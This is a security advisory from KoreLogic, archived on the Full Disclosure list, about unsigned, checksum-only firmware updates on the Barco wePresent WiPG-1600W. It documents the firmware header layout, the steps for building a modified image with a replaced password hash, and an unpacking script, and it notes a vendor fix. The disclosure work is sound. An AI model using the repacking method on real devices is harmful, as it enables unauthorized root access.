KL-001-2020-009 : Barco wePresent Insecure Firmware Image

Related Vulnerabilities: CVE-2020-28332   CVE-2020-28331  
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="39"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#40">By Date</a>
<a href="41"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="39"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#40">By Thread</a>
<a href="41"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">KL-001-2020-009 : Barco wePresent Insecure Firmware Image</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: KoreLogic Disclosures via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Fri, 20 Nov 2020 14:35:26 -0600


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">KL-001-2020-009 : Barco wePresent Insecure Firmware Image

Title: Barco wePresent Insecure Firmware Image
Advisory ID: KL-001-2020-009
Publication Date: 2020.11.20
Publication URL: <a rel="nofollow" href="https://korelogic.com/Resources/Advisories/KL-001-2020-009.txt">https://korelogic.com/Resources/Advisories/KL-001-2020-009.txt</a>


1. Vulnerability Details

&nbsp;&nbsp;&nbsp;&nbsp; Affected Vendor: Barco
&nbsp;&nbsp;&nbsp;&nbsp; Affected Product: wePresent WiPG-1600W
&nbsp;&nbsp;&nbsp;&nbsp; Affected Version: 2.5.1.8, 2.5.0.25, 2.5.0.24, 2.4.1.19
&nbsp;&nbsp;&nbsp;&nbsp; Platform: Embedded Linux
&nbsp;&nbsp;&nbsp;&nbsp; CWE Classification: CWE-494: Download of Code Without Integrity Check
&nbsp;&nbsp;&nbsp;&nbsp; CVE ID: CVE-2020-28332


2. Vulnerability Description

&nbsp;&nbsp;&nbsp;&nbsp; The Barco wePresent firmware does not perform verification
&nbsp;&nbsp;&nbsp;&nbsp; of digitally signed firmware updates and is susceptible to
&nbsp;&nbsp;&nbsp;&nbsp; processing and installing modified/malicious images.

3. Technical Description

&nbsp;&nbsp;&nbsp;&nbsp; The Barco wePresent firmware unpacks partially using
&nbsp;&nbsp;&nbsp;&nbsp; binwalk. Using 'dd' it is possible to extract the 4 component
&nbsp;&nbsp;&nbsp;&nbsp; files in the firmware. They are:

&nbsp;&nbsp;&nbsp;&nbsp; - a 512 byte header
&nbsp;&nbsp;&nbsp;&nbsp; - a cramfs file system
&nbsp;&nbsp;&nbsp;&nbsp; - a uBoot
&nbsp;&nbsp;&nbsp;&nbsp; - and a tar.gz'd set of files (where the /etc/shadow file lives)

&nbsp;&nbsp;&nbsp;&nbsp; The initial attempt at modifying the firmware failed when the
&nbsp;&nbsp;&nbsp;&nbsp; device computed a checksum and denied processing the modified
&nbsp;&nbsp;&nbsp;&nbsp; firmware. Knowing that a checksum was used in validating
&nbsp;&nbsp;&nbsp;&nbsp; firmware, the focus was on the header file. Most of the fields
&nbsp;&nbsp;&nbsp;&nbsp; in the header file are text-based and easily identifiable.
&nbsp;&nbsp;&nbsp;&nbsp; There were, however, fields whose purpose were not immediately
&nbsp;&nbsp;&nbsp;&nbsp; obvious. After some thought and processing of the bytes, the
&nbsp;&nbsp;&nbsp;&nbsp; following header file structure was identified. The following
&nbsp;&nbsp;&nbsp;&nbsp; is hexdump output with comments interspersed.

&nbsp;&nbsp;&nbsp;&nbsp; $ hexdump -C header
&nbsp;&nbsp;&nbsp;&nbsp; 00000000&nbsp; 61 77 2d 66 68 30 30 33&nbsp; 02 05 01 08 14 14 02 07&nbsp; |aw-fh003........|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (version=2.5.1.8)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (0x14 = 20; date = 2020/02/07
&nbsp;&nbsp;&nbsp;&nbsp; 00000010&nbsp; 61 77 69 6e 64 2e 57 69&nbsp; 50 47 2d 31 36 30 30 2e&nbsp; |awind.WiPG-1600.|
&nbsp;&nbsp;&nbsp;&nbsp; 00000020&nbsp; 57 4d 38 37 35 30 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |WM8750..........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000030&nbsp; 57 50 53 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |WPS.............|
&nbsp;&nbsp;&nbsp;&nbsp; 00000040&nbsp; 41 57 49 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |AWI.............|
&nbsp;&nbsp;&nbsp;&nbsp; 00000050&nbsp; 64 65 66 61 75 6c 74 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |default.........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000060&nbsp; f3 ec 90 07 08 22 ab cf&nbsp; 64 65 66 61 75 6c 74 00&nbsp; |....."..default.|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (0x0790ecf3 = 126938355 bytes = filesize of the firmware without the first 512 bytes, which is the header)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (0xcfab2208 = sum32 checksum of the firmware without the first 512 bytes, which is the header)
&nbsp;&nbsp;&nbsp;&nbsp; 00000070&nbsp; 00 00 00 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |................|
&nbsp;&nbsp;&nbsp;&nbsp; 00000080&nbsp; 61 77 2d 65 78 74 72 61&nbsp; 01 00 00 00 ff ff ff ff&nbsp; |aw-extra........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000090&nbsp; 00 00 00 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |................|
&nbsp;&nbsp;&nbsp;&nbsp; *
&nbsp;&nbsp;&nbsp;&nbsp; 00000200

&nbsp;&nbsp;&nbsp;&nbsp; Generating a new firmware version involved gunzip'ing and
&nbsp;&nbsp;&nbsp;&nbsp; untar'ing the filesystem, replacing the hash, and tar-gzip'ing
&nbsp;&nbsp;&nbsp;&nbsp; back up. Once it is tar.gz, it is necessary to concatenate
&nbsp;&nbsp;&nbsp;&nbsp; all parts of the new firmware together *without* the header
&nbsp;&nbsp;&nbsp;&nbsp; file. Next, calculate the sum32 checksum on this file. With
&nbsp;&nbsp;&nbsp;&nbsp; the new sum32 checksum and filesize of the tar.gz file, modify
&nbsp;&nbsp;&nbsp;&nbsp; the new header file to look like:

&nbsp;&nbsp;&nbsp;&nbsp; 00000000&nbsp; 61 77 2d 66 68 30 30 33&nbsp; 02 05 01 09 14 14 02 07&nbsp; |aw-fh003........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000010&nbsp; 61 77 69 6e 64 2e 57 69&nbsp; 50 47 2d 31 36 30 30 2e&nbsp; |awind.WiPG-1600.|
&nbsp;&nbsp;&nbsp;&nbsp; 00000020&nbsp; 57 4d 38 37 35 30 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |WM8750..........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000030&nbsp; 57 50 53 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |WPS.............|
&nbsp;&nbsp;&nbsp;&nbsp; 00000040&nbsp; 41 57 49 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |AWI.............|
&nbsp;&nbsp;&nbsp;&nbsp; 00000050&nbsp; 64 65 66 61 75 6c 74 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |default.........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000060&nbsp; 5f 2a 91 07 39 66 da cf&nbsp; 64 65 66 61 75 6c 74 00&nbsp; |_*..9f..default.|
&nbsp;&nbsp;&nbsp;&nbsp; 00000070&nbsp; 00 00 00 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |................|
&nbsp;&nbsp;&nbsp;&nbsp; 00000080&nbsp; 61 77 2d 65 78 74 72 61&nbsp; 01 00 00 00 ff ff ff ff&nbsp; |aw-extra........|
&nbsp;&nbsp;&nbsp;&nbsp; 00000090&nbsp; 00 00 00 00 00 00 00 00&nbsp; 00 00 00 00 00 00 00 00&nbsp; |................|
&nbsp;&nbsp;&nbsp;&nbsp; *
&nbsp;&nbsp;&nbsp;&nbsp; 00000200

&nbsp;&nbsp;&nbsp;&nbsp; Now, concatenate the header file onto the new firmware to
&nbsp;&nbsp;&nbsp;&nbsp; complete the firmware packaging. This new file can now be
&nbsp;&nbsp;&nbsp;&nbsp; uploaded to the wePresent device.&nbsp; After the firmware update,
&nbsp;&nbsp;&nbsp;&nbsp; the device will revert back to the default admin password of
&nbsp;&nbsp;&nbsp;&nbsp; "admin". The steps in KL-001-2020-007 (CVE-2020-28331) can
&nbsp;&nbsp;&nbsp;&nbsp; be run again to re-enable SSH, and now ssh in with a known
&nbsp;&nbsp;&nbsp;&nbsp; root password.

4. Mitigation and Remediation Recommendation

&nbsp;&nbsp;&nbsp;&nbsp; The vendor has released an updated firmware (2.5.3.12) which
&nbsp;&nbsp;&nbsp;&nbsp; remediates the described vulnerability. Firmware and release
&nbsp;&nbsp;&nbsp;&nbsp; notes are available at:

&nbsp;&nbsp;&nbsp;&nbsp; <a rel="nofollow" href="https://www.barco.com/en/support/software/R33050104">https://www.barco.com/en/support/software/R33050104</a>


5. Credit

&nbsp;&nbsp;&nbsp;&nbsp; This vulnerability was discovered by Jim Becher (@jimbecher) and
&nbsp;&nbsp;&nbsp;&nbsp; Matt Bergin (@thatguylevel) of KoreLogic, Inc.


6. Disclosure Timeline

&nbsp;&nbsp;&nbsp;&nbsp; 2020.08.24 - KoreLogic submits vulnerability details to
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Barco.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.08.25 - Barco acknowledges receipt and the intention
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; to investigate.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.09.21 - Barco notifies KoreLogic that this issue,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; along with several others reported by KoreLogic,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; will require more than the standard 45 business
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; day remediation timeline. Barco requests to delay
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; coordinated disclosure until 2020.12.11.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.09.25 - Barco informs KoreLogic of their intent to acquire
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CVE number for this vulnerability.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.11.09 - Barco shares CVE number with KoreLogic and announces
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; their intention to release the updated firmware
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ahead of schedule, on 2020.11.11. Request that KoreLogic
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; delay public disclosure until 2020.11.20.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.11.11 - Barco firmware release.
&nbsp;&nbsp;&nbsp;&nbsp; 2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

&nbsp;&nbsp;&nbsp;&nbsp; $ more unpack-firmware.sh
&nbsp;&nbsp;&nbsp;&nbsp; #!/bin/sh
&nbsp;&nbsp;&nbsp;&nbsp; dd bs=512 if=$1 of=$1.header count=1
&nbsp;&nbsp;&nbsp;&nbsp; dd bs=512 if=$1 of=$1.cromfs skip=1 count=10240
&nbsp;&nbsp;&nbsp;&nbsp; dd bs=512 if=$1 of=$1.uboot skip=10241 count=6144
&nbsp;&nbsp;&nbsp;&nbsp; dd bs=512 if=$1 of=$1.fs.tar.gz skip=16385

&nbsp;&nbsp;&nbsp;&nbsp; $ ls -altr
&nbsp;&nbsp;&nbsp;&nbsp; total 123972
&nbsp;&nbsp;&nbsp;&nbsp; drwxr-xr-x 5 user user&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4096 Jul 17 21:12 ..
&nbsp;&nbsp;&nbsp;&nbsp; drwxr-xr-x 2 user user&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4096 Jul 17 21:12 .
&nbsp;&nbsp;&nbsp;&nbsp; -rw-r--r-- 1 user user 126938867 Jul 17 21:12 awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad

&nbsp;&nbsp;&nbsp;&nbsp; $ ./unpack-firmware.sh awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad
&nbsp;&nbsp;&nbsp;&nbsp; 1+0 records in
&nbsp;&nbsp;&nbsp;&nbsp; 1+0 records out
&nbsp;&nbsp;&nbsp;&nbsp; 512 bytes copied, 0.000389048 s, 1.3 MB/s
&nbsp;&nbsp;&nbsp;&nbsp; 10240+0 records in
&nbsp;&nbsp;&nbsp;&nbsp; 10240+0 records out
&nbsp;&nbsp;&nbsp;&nbsp; 5242880 bytes (5.2 MB, 5.0 MiB) copied, 0.0501995 s, 104 MB/s
&nbsp;&nbsp;&nbsp;&nbsp; 6144+0 records in
&nbsp;&nbsp;&nbsp;&nbsp; 6144+0 records out
&nbsp;&nbsp;&nbsp;&nbsp; 3145728 bytes (3.1 MB, 3.0 MiB) copied, 0.0120293 s, 262 MB/s
&nbsp;&nbsp;&nbsp;&nbsp; 231542+1 records in
&nbsp;&nbsp;&nbsp;&nbsp; 231542+1 records out
&nbsp;&nbsp;&nbsp;&nbsp; 118549747 bytes (119 MB, 113 MiB) copied, 0.388187 s, 305 MB/s

&nbsp;&nbsp;&nbsp;&nbsp; $ file *
&nbsp;&nbsp;&nbsp;&nbsp; awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; data
&nbsp;&nbsp;&nbsp;&nbsp; awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.cromfs:&nbsp;&nbsp;&nbsp; Linux Compressed ROM File System data, little
endian size 4452352 version #2 sorted_dirs CRC 0xd1b0b3fa, edition 0, 2359 blocks, 918 files
&nbsp;&nbsp;&nbsp;&nbsp; awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.fs.tar.gz: gzip compressed data, last modified: Fri Feb&nbsp; 7
05:57:05 2020, from Unix
&nbsp;&nbsp;&nbsp;&nbsp; awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.header:&nbsp;&nbsp;&nbsp; data
&nbsp;&nbsp;&nbsp;&nbsp; awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.uboot:&nbsp;&nbsp;&nbsp;&nbsp; u-boot legacy uImage, Linux-2.6.32.9-default,
Linux/ARM, OS Kernel Image (Not compressed), 2104776 bytes, Thu May 30 06:06:07 2019, Load Address: 0x00008000, Entry
Point: 0x00008000, Header CRC: 0xB224BB24, Data CRC: 0xD50B7080


The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
<a rel="nofollow" href="http://creativecommons.org/licenses/by-sa/4.0/">http://creativecommons.org/licenses/by-sa/4.0/</a>

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
<a rel="nofollow" href="https://www.korelogic.com/about-korelogic.html">https://www.korelogic.com/about-korelogic.html</a>

Our public vulnerability disclosure policy is available at:
<a rel="nofollow" href="https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt">https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt</a>
</pre><p><strong>Attachment:
<a href="att-40/signature_asc.bin"><tt>signature.asc</tt></a></strong>

<em>Description:</em> OpenPGP digital signature</p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="39"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#40">By Date</a>
<a href="41"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="39"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#40">By Thread</a>
<a href="41"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>KL-001-2020-009 : Barco wePresent Insecure Firmware Image</strong> <em>KoreLogic Disclosures via Fulldisclosure (Nov 20)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>